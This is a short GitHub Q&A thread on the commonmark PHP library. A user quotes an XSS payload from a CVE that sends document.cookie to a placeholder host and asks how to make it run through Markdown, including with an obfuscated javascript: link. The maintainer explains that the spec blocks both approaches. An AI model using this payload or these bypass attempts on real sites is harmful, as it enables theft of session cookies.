### DISCUSSION TITLE
Question: script   markdown transformation

### DISCUSSION THREAD

**Discussion by lqgithu** [thephpleague/commonmark#638] [Q&A] [answered]
I have below script used in CVE-2020-20583 and to be transformed into common mark format:
<script>new Image ().src="http://test.com:2222/"+document.cookie; </script>
I tried below two methods:
1) " three backtick+ javascript
   new Image ().src="http://test.com:2222/"+document.cookie; 
  "three backtick
but it only display command, it didn't execute the command.

2) "[Click me]""(javascri%0Apt":new\Image\().src="http://test.com:2222/"+document.cookie)"
the command not able to include .src=****** into the hyperlink
so is there any limitation for markdown to handle scripts with spaces? thanks

**Comment by colinodell** [comment, marked as answer]
> three backtick [...]  only display command, it didn't execute the command.

Using three backticks creates a [fenced code block](https://spec.commonmark.org/0.29/#fenced-code-blocks) which will render the code as-is - good for sharing code examples

> so is there any limitation for markdown to handle scripts with spaces?

Yes, [as I mentioned yesterday](https://github.com/thephpleague/commonmark/issues/592#issuecomment-748489501), the CommonMark spec does not allow for ASCII spaces within link destinations, including ones that are actually malicious XSS links like your example.
